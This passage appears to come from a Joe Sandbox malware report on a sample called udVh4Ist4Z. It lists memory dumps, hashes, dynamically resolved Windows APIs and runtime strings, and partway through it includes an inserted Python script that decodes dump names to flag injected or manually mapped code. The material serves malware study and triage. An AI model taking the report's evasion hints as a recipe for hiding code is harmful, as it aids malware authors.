                                                                                        • Instruction ID: d3d26069e32249c327cb93cc415719a8292139345e5762092bc57a1daa8f468a
                                                                                        • Opcode Fuzzy Hash: efa83b71b02f601142691e2f830ce7d8f28cd9cf9b8ded4ba91d0f0c820722cc
                                                                                        • Instruction Fuzzy Hash: 1F318639D1DB80CB7361F976404E176B680FF6925679C6DCE8867828452A0C8C2B8FD7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0229eb4fb01197e5da1b57971c7c97f8264d979de064060e7e876e90b447d6a
                                                                                        • Instruction ID: 9165e34f79be271df269099a81a36b4cd0564ff5b11dcab2fed2a519d4ded775
                                                                                        • Opcode Fuzzy Hash: a0229eb4fb01197e5da1b57971c7c97f8264d979de064060e7e876e90b447d6a
                                                                                        • Instruction Fuzzy Hash: 9C31B43AE35A80C77350E8BD404F172F591DF61654B6429CAC86E82A407E1D88AB8FC6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1bbf9b4f2d4226785c5a90c4fa0ba9b85b3d41db6c61e393382e104b37dc5d48
                                                                                        • Instruction ID: a82b48141e3d0b66753921885288fc2de3ff3371e92849a2a7b8d9d6c9928bdf
                                                                                        • Opcode Fuzzy Hash: 1bbf9b4f2d4226785c5a90c4fa0ba9b85b3d41db6c61e393382e104b37dc5d48
                                                                                        • Instruction Fuzzy Hash: C221B63ED0DB90CB6261F8BA404E136BA90FF6D61679C7DCEC957428452A0C4C6F8F96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e0b922751b4bc5b7be17843313b4233d2c9b20d982a4c415fa7e1bcba5933b0
                                                                                        • Instruction ID: 178350541eddd48480c23dfd84da6b4ed488d5b234be7a9abd364f431e905db4
                                                                                        • Opcode Fuzzy Hash: 9e0b922751b4bc5b7be17843313b4233d2c9b20d982a4c415fa7e1bcba5933b0
                                                                                        • Instruction Fuzzy Hash: A7217339D1DB80CB6361F976404E176B680FF696167986CCE89A7828442A0C8C2B8B97
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
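The dotted names of the .sdmp sources listed above encode the dumped region's base address and its memory attributes in hex, which is the quickest way to tell a plain data buffer from an injected image before opening any dump. The Python below is an added example (not Joe Sandbox code or output) that decodes those fields against the winnt.h PAGE_* and MEM_* constants. The field order it assumes, process index, analysis phase, dump id, base address, protect, state, type and a trailing reserved field, is inferred from the names on this page and is not documented here; the triage notes in assess() are the editor's own heuristics, and the "based on PE" flag is taken from the report line, not from the name. The four sample names are copied from this section. Run on them, the decoder shows that 02B60000 is a committed, private, read/write region without PE headers (a typical home for decrypted payload bytes), while 02D60000 holds a PE whose header page is read-only and whose code page at 02D61000 is execute/read, yet all of it sits in MEM_PRIVATE rather than MEM_IMAGE memory, so it was not mapped by the image loader.

```python
"""Decode Joe Sandbox .sdmp dump names into VirtualQuery-style attributes.

Added example; not Joe Sandbox code. The field layout of the dotted name is an
assumption inferred from the names in this report; the constants are winnt.h.
"""
import re
from dataclasses import dataclass
from typing import List

# winnt.h page-protection, state and type values (exact constants)
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

# Assumed layout (inferred from this page, not documented by the report):
# <process index>.<analysis phase>.<dump id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
DUMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    phase: int
    dump_id: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:X}")
        mods = [name for bit, name in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* variant

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE, WRITECOPY and their EXECUTE forms

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_dump_name(name: str) -> DumpRegion:
    """Split a dump file name into its numeric fields; raises on unexpected shapes."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    proc, phase, dump_id, base, prot, state, mtype, _reserved = m.groups()
    return DumpRegion(int(proc), int(phase), int(dump_id), int(base, 16),
                      int(prot, 16), int(state, 16), int(mtype, 16))


def assess(region: DumpRegion, based_on_pe: bool) -> List[str]:
    """Editor's triage heuristics; based_on_pe comes from the report, not the name."""
    notes = []
    if region.writable and region.executable:
        notes.append("RWX region: shellcode staging or self-modifying code target")
    if based_on_pe and region.mem_type != MEM_IMAGE:
        notes.append(f"PE headers in {region.type_name} memory, not MEM_IMAGE: "
                     "not mapped by the image loader (manual mapping or hollowing)")
    if not based_on_pe and region.writable and not region.executable:
        notes.append("non-PE writable buffer: candidate for decrypted/unpacked payload bytes")
    return notes


def describe(name: str, based_on_pe: bool) -> str:
    r = parse_dump_name(name)
    line = (f"proc#{r.process_index} phase {r.phase} base 0x{r.base:08X} "
            f"{r.protect_name} {r.state_name} {r.type_name}")
    for note in assess(r, based_on_pe):
        line += f"\n    ! {note}"
    return line


# Constructed sample: the dump names listed in this section, with the page's PE flag
SAMPLES = [
    ("00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp", False),
    ("00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp", True),
    ("00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp", True),
    ("00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp", True),
]

if __name__ == "__main__":
    for sample_name, pe_flag in SAMPLES:
        print(describe(sample_name, pe_flag))
```

Running the script prints one line per dump with its decoded protection, state and type, followed by any triage note. The same decoder can be pointed at a whole report's "Source File" and "Associated" lines to rank which dumps deserve manual attention first: private memory holding PE headers, and any region that is both writable and executable, outrank plain read/write buffers.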

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 598e4fa0a6c3dc71279868387853e6bd34256f3a3637c12d194fc477c962afa7
                                                                                        • Instruction ID: 590312db1251b1f871dc1defa2783c190f0f3d7a303ba406ed95d43c76f4bd48
                                                                                        • Opcode Fuzzy Hash: 598e4fa0a6c3dc71279868387853e6bd34256f3a3637c12d194fc477c962afa7
                                                                                        • Instruction Fuzzy Hash: AF21823DD1A681CB7261D9B8410F532B680EB2535479029CACD6BC148D6F1D886BCEC7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 111b53cff25a2673dd558ca79a485901786b4927559ee575d709e235e0b2dc1a
                                                                                        • Instruction ID: 4c0f6a6b993273ae82c84b3a6c7856dfdbe8839d09ac3fc87569ed1065c8cdf9
                                                                                        • Opcode Fuzzy Hash: 111b53cff25a2673dd558ca79a485901786b4927559ee575d709e235e0b2dc1a
                                                                                        • Instruction Fuzzy Hash: 1021803AD09B80C77261F8BE404E277BA91FF753147942DC9CA67814C02A1C9C6A8ED7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 60bccb0983a195af127729942d00bd15ea1b5169b5dcd8ddf11bf3476f6f730f
                                                                                        • Instruction ID: 2731862692de08f0f6529b326196b9ee55b90f76e74df3b149c4a3ad55b19536
                                                                                        • Opcode Fuzzy Hash: 60bccb0983a195af127729942d00bd15ea1b5169b5dcd8ddf11bf3476f6f730f
                                                                                        • Instruction Fuzzy Hash: 0221D239D2ABC0CB6761E9BC410F137F690EF653117642CC9C82F529816E1C8C6B8AC6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3cb9c06afc936722c8cf0aac957b8075e2c204ded11318b568d289886b440f4f
                                                                                        • Instruction ID: 65d911e347c7c7029570c92536400b2f6b1506561996d872c4dd42c2f1b9ee44
                                                                                        • Opcode Fuzzy Hash: 3cb9c06afc936722c8cf0aac957b8075e2c204ded11318b568d289886b440f4f
                                                                                        • Instruction Fuzzy Hash: 3C21AD3A929BC0C77791F97C404F676B690EF652107A42DC9C46B529816A1C4C6F8A86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c54a113798a5fb0fc1339d7fb877decd2b6785cfdab7e57e038a59e30a6ee17
                                                                                        • Instruction ID: 607241561f6b7bdb0adfd2cedf497b6ffb9d3f0f980a2ebd08f99ff9f141658c
                                                                                        • Opcode Fuzzy Hash: 7c54a113798a5fb0fc1339d7fb877decd2b6785cfdab7e57e038a59e30a6ee17
                                                                                        • Instruction Fuzzy Hash: 9F219139D26B50C77360E9BC404F232F6D0EF2525575829C9C96F83E817A1C886B8F86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 992b65f13630ebc56c94cd2062cf8516ba52e32c871384366916605f9df41cd9
                                                                                        • Instruction ID: 971bb1622aa5df668b6624c37f5af85f83f41292eb62c2df152a20de8e3ae032
                                                                                        • Opcode Fuzzy Hash: 992b65f13630ebc56c94cd2062cf8516ba52e32c871384366916605f9df41cd9
                                                                                        • Instruction Fuzzy Hash: 46216539D4DB80CB6361F976404F137F680FF2D3167586DCA8967828806E1C8C6A8AC7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0238eb00d718a015d6a17870e1c320297f6e0322f9d5fe124c5846cb226447a8
                                                                                        • Instruction ID: 32e322d6933fe4483ff3c3fa85ed250364bff5be8a4ae92083195db0eeb510d2
                                                                                        • Opcode Fuzzy Hash: 0238eb00d718a015d6a17870e1c320297f6e0322f9d5fe124c5846cb226447a8
                                                                                        • Instruction Fuzzy Hash: 0121F239D2A7C0CB7760F9B8400F537F690EF2131175429C9C82F829816E1C4CAB8AC6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D6D259
                                                                                          • Part of subcall function 02D6D224: GetProcAddress.KERNEL32(00000000), ref: 02D6D23D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                        • API String ID: 1646373207-1918263038
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D76E9A
                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D76EAB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D76EBB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02D76ECB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02D76EDB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02D76EEB
                                                                                        • GetProcAddress.KERNEL32 ref: 02D76EFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                        • API String ID: 667068680-2233174745
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D628CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                        • API String ID: 2030045667-32948583
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02D7A078
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02D7A08F
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02D7A095
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D7A123
                                                                                        • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02D7A12F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D7A143
                                                                                        Strings
                                                                                        • C:\Windows\System32\KernelBase.dll, xrefs: 02D7A08A
                                                                                        • LoadLibraryExA, xrefs: 02D7A085
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressHandleModuleProc
                                                                                        • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                        • API String ID: 1061262613-1650066521
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D62849
                                                                                        • The unexpected small block leaks are:, xrefs: 02D62707
                                                                                        • , xrefs: 02D62814
                                                                                        • An unexpected memory leak has occurred. , xrefs: 02D62690
                                                                                        • bytes: , xrefs: 02D6275D
                                                                                        • Unexpected Memory Leak, xrefs: 02D628C0
                                                                                        • 7, xrefs: 02D626A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                        • API String ID: 0-2723507874
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000000,02D6C047,?,?,00000000,00000000), ref: 02D6BDB2
                                                                                          • Part of subcall function 02D6A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 4232894706-2493093252
                                                                                        • Opcode ID: be056ba0c3cefa40aa08ed1d5ca11d6ac0053029e8c104674a3db4980bb2d525
                                                                                        • Instruction ID: 983388ba9288dc9eceebdd7c5724ce67c93c2904d5720c9a8f845145d004cce0
                                                                                        • Opcode Fuzzy Hash: be056ba0c3cefa40aa08ed1d5ca11d6ac0053029e8c104674a3db4980bb2d525
                                                                                        • Instruction Fuzzy Hash: D3613034B051899BDB10EBA4D868ABF77B7DF88300F609476E141EB745DA35DD068BB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?,02DC47C8,?,?,02D8B7A8,02D66575,02D8A305), ref: 02D64359
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?,02DC47C8,?,?,02D8B7A8,02D66575,02D8A305), ref: 02D6435F
                                                                                        • GetStdHandle.KERNEL32(000000F5,02D643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?,02DC47C8), ref: 02D64374
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,02D643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?), ref: 02D6437A
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D64398
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileHandleWrite$Message
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1570097196-2970929446
                                                                                        • Opcode ID: e73827c2aaf87945aa215db81f250cad647455d85ab7d9f73cf9f89a1a664314
                                                                                        • Instruction ID: 75b64c5bf07d957f76abd6265a56fd7f4a4b733001f4d17d50fb901ec7ca15ea
                                                                                        • Opcode Fuzzy Hash: e73827c2aaf87945aa215db81f250cad647455d85ab7d9f73cf9f89a1a664314
                                                                                        • Instruction Fuzzy Hash: A9F0F660AC0341BAF621B6A0BC0EF79271C9740B25F244A06B664D53C4C7A48CC89732
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 02D6ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6AD15
                                                                                          • Part of subcall function 02D6ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D6AD39
                                                                                          • Part of subcall function 02D6ACF8: GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6AD54
                                                                                          • Part of subcall function 02D6ACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D6ADEA
                                                                                        • CharToOemA.USER32(?,?), ref: 02D6AEB7
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D6AED4
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D6AEDA
                                                                                        • GetStdHandle.KERNEL32(000000F4,02D6AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D6AEEF
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,02D6AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D6AEF5
                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D6AF17
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D6AF2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 185507032-0
                                                                                        • Opcode ID: ccc626d569f853b86aa0738d4411c86e812e7c8aa03a482d82b1551fad8a3b81
                                                                                        • Instruction ID: a20ceb7516445eedef678657e2762ace4c7c7f0471c6c7f199d184d6d98f9612
                                                                                        • Opcode Fuzzy Hash: ccc626d569f853b86aa0738d4411c86e812e7c8aa03a482d82b1551fad8a3b81
                                                                                        • Instruction Fuzzy Hash: 67118CB65442057FD200EBA4DC89FAA73EDEB44700F400965B294E62E0DA74ED448FB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D6E5E1
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D6E5FD
                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D6E636
